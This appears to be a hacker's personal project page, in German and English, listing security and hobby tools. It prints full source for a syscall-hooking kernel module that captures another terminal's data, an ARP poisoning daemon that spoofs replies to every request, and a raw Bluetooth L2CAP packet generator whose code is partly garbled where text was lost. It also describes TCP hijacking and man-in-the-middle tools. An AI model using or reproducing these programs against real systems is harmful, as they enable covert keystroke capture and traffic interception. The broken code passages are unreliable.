Anfangs haben wir die 120 Sorten Bier im Freiburger Bierhaus noch mit zwei normalen Würfeln erwürfelt, doch nach dem 4. Bier weiss man dann die ganzen Zahlen nicht mehr und so kam es wie es kommen musste!
Ich hab dafür ne Java Applikation fürs Handy geschrieben. Klar... Wozu is man Programmierer ^^
Der Bierwürfel merkt sich nicht nur was man getrunken hat, man kann ihm auch sagen was einem nicht geschmeckt hat und das wird dann nicht mehr erwürfelt. Nebenbei kann man noch die Augenzahl konfigurieren, so dass man ihn auch in Kneipen mit weniger Bierauswahl einsetzen kann.
Für die nahe Zukunft ist noch geplant Bierkarten als XML Dateien laden zu können, damit man zu den Nummern den Namen, Preis und Alkgehalt des Bieres kennt.
Wer mitwürfeln möchte, braucht sich lediglich dieses JAR File aufs Handy zu laden.
Du kannst Java und möchtest dem Bierwürfel gern selbst noch nen neues Feature verpassen?
Kein Problem hier ist der Source Code.
HF && Prost! *g*

Hi there and greets from 24th Chaos Communication Congress.
Here’s a new release of Bluediving – The next generation Bluetooth security tool.
What’s new in 0.9?

- minor tools compile bugfixes by fireangel148
- minor compile bugfixes by niekt
- minor menu management / sound check bugfix by niekt
- make_tools.sh now compiles redfang
- Bugfixes in loop mode
- Scan for specific device type

Click && HF

Der Chaosagent steht ihnen zu Diensten.
Egal ob Sie Suchergebnisse über Yahoo automatisieren möchten, keine Lust haben aus ihren RSS Feeds selbst das wichtigste raus zu suchen oder nur mal kurz wissen wollen wie draussen das Wetter ist, der Agent wird Ihnen diese Arbeit abnehmen und Ihnen wahlweise per Text oder Sprachausgabe antworten.
Als I-Tüpfelchen baut er auf Wunsch aus den gefilterten RSS News ihren persönlichen Feed zusammen.
Zur Sprachausgabe wird festival benötigt.
Click

Changelog für 0.7:
* Suchergebnisse können jetzt als RSS Feed ausgegeben werden

/*
* L2CAP packetgenerator
*
* By Bastian Ballmann
* http://www.datenterrorist.de
* Last update: 04.02.2007
*
* Some code borrowed from bss - thx 2 Pierre
*
* License: GPLv3
*/

// Includes
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>




// Functions
void usage(void);

// MAIN PART
int main(int argc, char *argv[])
{
l2cap_cmd_hdr *cmd; // struct detailed in kernel_source/include/net/bluetooth/l2cap.h
struct sockaddr_l2 laddr, raddr;
struct hci_dev_info di;
char *buf, *remote_address = NULL;
char dummy_payload[] = "greets from ccc easterhegg 2007";
char *payload = dummy_payload;
int sock, c, i;
int l2_code = 0x08;
int l2_ident = 23;
int l2_hsize = 42;

// Get params
while ((c = getopt (argc, argv, "a:c:i:p:s:")) != -1)
{
switch (c)
{
case 'a':
remote_address = optarg;
break;

case 'c':
l2_code = atoi(optarg);
break;

case 'i':
l2_ident = atoi(optarg);
break;

case 'p':
payload = (char *)optarg;
break;

case 's':
l2_hsize = atoi(optarg);
break;

default:
usage();
break;
}
}

if(remote_address == NULL)
{
printf(">>> I need at least a remote btaddr...\n\n");
usage();
exit(EXIT_FAILURE);
}

if(l2_hsize == 42)
{
l2_hsize = strlen(payload);
}

// Get local device info
if(hci_devinfo(0, &di) code = l2_code;
cmd->ident = l2_ident;
cmd->len = htobs(l2_hsize);

/* Copy payload after l2cap header */
strncpy((buf + L2CAP_CMD_HDR_SIZE), payload, strlen(payload));

/* Throw the packet into the air */
if(send(sock, buf, L2CAP_CMD_HDR_SIZE + strlen(payload), 0) -c -i -p -s \n");
printf("L2CAP command codes:\n");
printf("L2CAP_COMMAND_REJ 0x01\n");
printf("L2CAP_CONN_REQ 0x02\n");
printf("L2CAP_CONN_RSP 0x03\n");
printf("L2CAP_CONF_REQ 0x04\n");
printf("L2CAP_CONF_RSP 0x05\n");
printf("L2CAP_DISCONN_REQ 0x06\n");
printf("L2CAP_DISCONN_RSP 0x07\n");
printf("L2CAP_ECHO_REQ 0x08\n");
printf("L2CAP_ECHO_RSP 0x09\n");
printf("L2CAP_INFO_REQ 0x0a\n");
printf("L2CAP_INFO_RSP 0x0b\n");
exit(EXIT_SUCCESS);
}

Loginwatcher ist ein kleines Perl Script, das im Hintergrund läuft und via Festival Logins / Logouts meldet.
Click

Die Blinken Bluetooth Installation auf dem 22C3 sorgt dafür, dass Bluetooth Devices abhängig von ihrem Device Namen und Type Blinkenmovies abspielen. Desweiteren lösen Bluetooth Events wie l2ping oder iscan Animationen aus. Es gibt noch einen zu 99% fertigen OBEX Server mit dem man Nachrichten per Vcard einsenden kann (es fehlt nur die Ermittlung des Dateinamen der eingesendeten Datei).
Den Source Code des Projects gibt es nun auf der Chaostal Project Seite

P.A.T.H. (Perl Advanced TCP Hijacking) consists of a packetgenerator (constructing TCP/IP, UDP/IP, ICMP and ARP packets), a RST daemon (to reset TCP connections), a sniffer (with special mail and telnet modes), an ICMP redirection tool (to implement man-in-the-middle attacks with icmp redirect messages), an ARP redirection tool, an IDS testing tool and an automatic hijacking daemon for plain protocols (like telnet).
Click

GPGlist is used in alias files like in sendmail or postfix and possibly other MTAs to implement GPG encrypted mailing lists.
It's based on the code of Francisco Jesus Monserrat Coll.
But it's a complete rewrite from scratch!
It uses one XML config file to store information about lists, it backups mails if an error occours and sends out error mails to the sender of the mail, you can decide if a list only excepts encrypted mails and it's imho easier to debug and implement as the gpgalias code.
Click

Mit NewsGrab kann man schnell viele Newsgroups nach unterschiedlichen Artikeln durch suchen, bestimmte Arikel überwachen und deren Message ID, Header ausgeben, einfache Statistiken generieren oder einfach nur einen Artikel anhand seiner Message ID downloaden. NewsGrab wird flexibel über eine XML Datei configuriert und unterstützt mehrere Suchbegriffe pro Newsgroup, die auch reguläre Ausdrücke enthalten dürfen. Außerdem kann man mehrere Newsserver (mit oder ohne Authentification) verwenden, falls einer mal offline sein sollte.
click

Suran vom CCC Freiburg hat mein blue-cmd Script als Hotplug Script umgeschrieben.
Hotplug Script
Cron Scan Script
TGZ Archiv

A simple LKM to sniff a TTY. The TTY to sniff will be configured in /proc/ttysniff and the data can be read from the device /dev/ttysniff (mknod /dev/ttysniff c 40 0).


/*
Just a simple TTY sniffing LKM for Linux 2.4
TTY to sniff can be configured via /proc/ttysniff/*
(default is major 4 minor 2)
TTY data can be read from the device /dev/ttysniff
(use the tool watchtty to do so)
Device must exist (mknod /dev/ttysniff c 40 0)

Programmed by Bastian Ballmann
http://www.datenterrorist.de
30.06.2004

Compile with gcc -I/usr/src/linux/include -c ttysniff.c
Run with insmod ttysniff.o

This program is free software; you can redistribute
it and/or modify it under the terms of the
GNU General Public License version 2 as published
by the Free Software Foundation.

This program is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
*/

#define __KERNEL__
#define MODULE
#define PROCHOOK_H

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>


EXPORT_NO_SYMBOLS;
MODULE_LICENSE("GPL");

/* Syscall stuff */
extern void *sys_call_table[];
int (*old_write)(int, const void *, size_t);
int new_write(int, const void *, size_t);

/* TTY */
#define TTYSIZE 4
char tty_minor[TTYSIZE] = {0};
char tty_major[TTYSIZE] = {0};

/* Ring buffer to store input */
#define BUFSIZE 4096
char buffer[BUFSIZE] = {0};
int buf_in = 0;
int buf_out = 0;

/* Proc stuff */
struct proc_dir_entry *proc_dir;
struct proc_dir_entry *proc_minor;
struct proc_dir_entry *proc_major;
int proc_read_minor(char *, char **, off_t, int, int *, void *);
int proc_write_minor(struct file *, const char *, unsigned long, void *);
int proc_read_major(char *, char **, off_t, int, int *, void *);
int proc_write_major(struct file *, const char *, unsigned long, void *);

/* Device stuff */
static int dev_open(struct inode *, struct file *);
static int dev_close(struct inode *, struct file *);
static int dev_read(struct file *, char *, size_t, loff_t *);

static struct file_operations fops =
{
owner: THIS_MODULE,
read: dev_read,
open: dev_open,
release: dev_close,
};


/************************************************************************
MAIN PART
************************************************************************/

/* Initialization */
int init_module(void)
{
/* Default TTY */
tty_major[0] = '4';
tty_minor[0] = '2';

/* Create proc dir */
proc_dir = proc_mkdir("ttysniff", &proc_root);

/* Create proc files */
if(proc_dir)
{
proc_major = create_proc_entry("major", 0600, proc_dir);
proc_major->owner = THIS_MODULE;
proc_major->write_proc = proc_write_major;
proc_major->read_proc = proc_read_major;

proc_minor = create_proc_entry("minor", 0600, proc_dir);
proc_minor->owner = THIS_MODULE;
proc_minor->write_proc = proc_write_minor;
proc_minor->read_proc = proc_read_minor;
}

/* Register device */
if(register_chrdev(40, "ttysniff", &fops))
return -EIO;

/* Overwrite write syscall */
old_write = sys_call_table[__NR_write];
sys_call_table[__NR_write] = new_write;

return 0;
}

/* Cleanup */
void cleanup_module(void)
{
/* Remove proc dir */
remove_proc_entry(proc_dir->name, &proc_root);

/* Unregister device */
unregister_chrdev(40, "ttysniff");

/* Restore write syscall */
sys_call_table[__NR_write] = old_write;
}


/************************************************************************
Syscalls
************************************************************************/

/*
New write() syscall
Invoke the old write() syscall
Test if data is writen to the device we should monitor
Copy data to our ring buffer if so
*/
int new_write(int fd, const void *buf, size_t count)
{
/* Get the inode of the filehandle */
struct file *file = (struct file *)fget(fd);
struct dentry *dentry = (struct dentry *)file->f_dentry;
struct inode *inode = (struct inode *)dentry->d_inode;

/* Invoke the old write() syscall */
int bytes_read = old_write(fd,buf,count);

/* Is this the TTY we shall sniff input from? */
if( (major(inode->i_rdev) == simple_strtol(tty_major,NULL,0)) &&
(minor(inode->i_rdev) == simple_strtol(tty_minor,NULL,0)) )
{
/* Copy the userland buffer byte by byte into our ring buffer */
while(count)
{
if(buf_in > BUFSIZE-1)
buf_in = 0;

get_user(buffer[buf_in++], (char*)buf++);
count--;
}
}

fput(file);
return bytes_read;
}


/************************************************************************
Proc
************************************************************************/

/* Read major number */
int proc_read_major(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
return sprintf(buf,"%s\n",tty_major);;
}

/* Write major number */
int proc_write_major(struct file *file, const char *buf, unsigned long count, void *data)
{
memset(tty_major,'',TTYSIZE);
strncpy(tty_major,buf,count);
return strlen(buf);
}

/* Read minor number */
int proc_read_minor(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
return snprintf(buf,count,"%s\n",tty_minor);;
}

/* Write minor number */
int proc_write_minor(struct file *file, const char *buf, unsigned long count, void *data)
{
memset(tty_minor,'',TTYSIZE);
strncpy(tty_minor,buf,count);
return strlen(buf);
}


/************************************************************************
Device
************************************************************************/

/* Open the device */
static int dev_open(struct inode *i, struct file *f)
{
if(current->euid != 0)
return -1;

MOD_INC_USE_COUNT;
return 0;
}

/* Close the device */
static int dev_close(struct inode *i, struct file *f)
{
MOD_DEC_USE_COUNT;
return 0;
}

/* Read from device */
static int dev_read(struct file *file, char *buf, size_t count, loff_t *pos)
{
int bytes_read = 0;

/* No new input? */
if(buf_out == buf_in)
return 0;

if(buffer[buf_out] == 0)
return 0;

/* Copy the ring buffer to the userland buffer */
while(count && buffer[buf_out])
{
put_user(buffer[buf_out++], buf++);
count--;
bytes_read++;

if(buf_out > BUFSIZE-1)
{
buf_out = 0;
break;
}
}

return bytes_read;
}
// EOF

/*
Simple program to read input from /dev/ttysniff
Programmed by Bastian Ballmann
http://www.datenterrorist.de
30.06.2004

This program is free software; you can redistribute
it and/or modify it under the terms of the
GNU General Public License version 2 as published
by the Free Software Foundation.

This program is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
*/

#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>


int main(void)
{
char c;

/* open device */
int fd = open("/dev/ttysniff",O_RDONLY);

if(fd == -1)
{
perror("open /dev/ttyhijack");
exit(1);
}

/* Unbuffered output */
setvbuf(stdout, NULL, _IONBF, 0);

/* Read input and write it to stdout */
while(1)
{
if(read(fd,&c,1) > 0)
putchar(c);
else
usleep(1);
}

close(fd);
return 0;
}

// [EOF]

/*

A simple ARP poisoning daemon,

Programmed by Bastian Ballmann

Last update: 06.06.2004

http://www.datenterrorist.de

*/

#include <sys/ioctl.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <net/ethernet.h>

#include <net/if.h>

#define ARPOP_REPLY 2

#define ARPHDR_ETHER 1

#define ETH_ALEN 6

#define IP_ALEN 4

// ARP Header Struktur

struct arphdr

{

u_short hw_type; // hardware type

u_short proto_type; // protocol type

char ha_len; // hardware address length

char pa_len; // protocol address length

u_short opcode; // arp opcode

unsigned char source_add[ETH_ALEN]; // source mac

unsigned char source_ip[IP_ALEN]; // source ip

unsigned char dest_add[ETH_ALEN]; // destination mac

unsigned char dest_ip[IP_ALEN]; // destination ip

};

int main(int argc, char *argv[])

{

int r_sock, w_sock;

int packetsize = sizeof(struct ether_header) + sizeof(struct arphdr);

char packet[packetsize];

struct ether_header *eth = (struct ether_header *) packet;

struct arphdr *arp = (struct arphdr *)(packet + sizeof(struct ether_header));

unsigned char arppacket[sizeof(struct arphdr) + sizeof(struct ether_header)];

struct ether_header *spoof_eth = (struct ether_header *)arppacket;

struct arphdr *spoof_arp = (struct arphdr *)(arppacket + sizeof(struct ether_header));

struct sockaddr addr;

int one = 1;

struct ifreq iface;

char smac[ETH_ALEN];

if(argc < 2)

{

printf("%s <device>\n", argv[0]);

exit(1);

}

// Are you root?

if(getuid() != 0)

{

printf("You must be root\n");

exit(1);

}

// Raw Socket to read

if((r_sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)

{

perror("socket");

exit(1);

}

// Raw Socket to write

if((w_sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)

{

perror("socket");

exit(1);

}

// Read MAC Address

strcpy(iface.ifr_name, argv[1]);

if((ioctl(r_sock, SIOCGIFHWADDR, &iface)) < 0)

{

perror("ioctl SIOCGIFHWADDR");

exit(1);

}

else

{

sprintf(smac,"%02x:%02x:%02x:%02x:%02x:%02x",

iface.ifr_hwaddr.sa_data[0] & 0xff,

iface.ifr_hwaddr.sa_data[1] & 0xff,

iface.ifr_hwaddr.sa_data[2] & 0xff,

iface.ifr_hwaddr.sa_data[3] & 0xff,

iface.ifr_hwaddr.sa_data[4] & 0xff,

iface.ifr_hwaddr.sa_data[5] & 0xff);

}

// Wait for ARP requests and send ARP replies

while(1)

{

read(r_sock,packet,packetsize);

// Is that packet an ARP request?

if((eth->ether_type == 1544) && (arp->opcode == 256))

{

// Ethernet Header

memcpy(spoof_eth->ether_dhost, eth->ether_shost, ETH_ALEN); // Destination MAC

memcpy(spoof_eth->ether_shost, smac, ETH_ALEN); // Source MAC

spoof_eth->ether_type = htons(ETHERTYPE_ARP); // Packet type

// ARP Header

spoof_arp->hw_type = htons(ARPHDR_ETHER); // Hardware address type

spoof_arp->proto_type = htons(ETH_P_IP); // Protocol address type

spoof_arp->ha_len = ETH_ALEN; // Hardware address length

spoof_arp->pa_len = IP_ALEN; // Protocol address length

spoof_arp->opcode = htons(ARPOP_REPLY); // ARP operation type

memcpy(spoof_arp->source_add, (char*)ether_aton(smac), ETH_ALEN); // Sender MAC

memcpy(spoof_arp->source_ip, arp->dest_ip, IP_ALEN); // Source IP

memcpy(spoof_arp->dest_add, arp->source_add, ETH_ALEN); // Target MAC

memcpy(spoof_arp->dest_ip, arp->source_ip, IP_ALEN); // Target IP

// Run packet! Run!


strncpy(addr.sa_data, argv[1], sizeof(addr.sa_data));

printf("arp reply %s is at %s\n", inet_ntoa(*(struct in_addr*)&spoof_arp->source_ip), smac);

if(sendto(w_sock, arppacket, packetsize, 0, &addr, sizeof(addr)) < 0)

{

perror("send");

exit(1);

}

}

}

close(r_sock);

close(w_sock);

return 0;

}

Beispielcode zum auslesen der Services eines SDP Daemons (BlueZ).
click

Beispielcode zum auslesen eines lokalen Bluetooth Devices (BlueZ).
click

Beispielcode für HCI Inquiry Scan (BlueZ).
click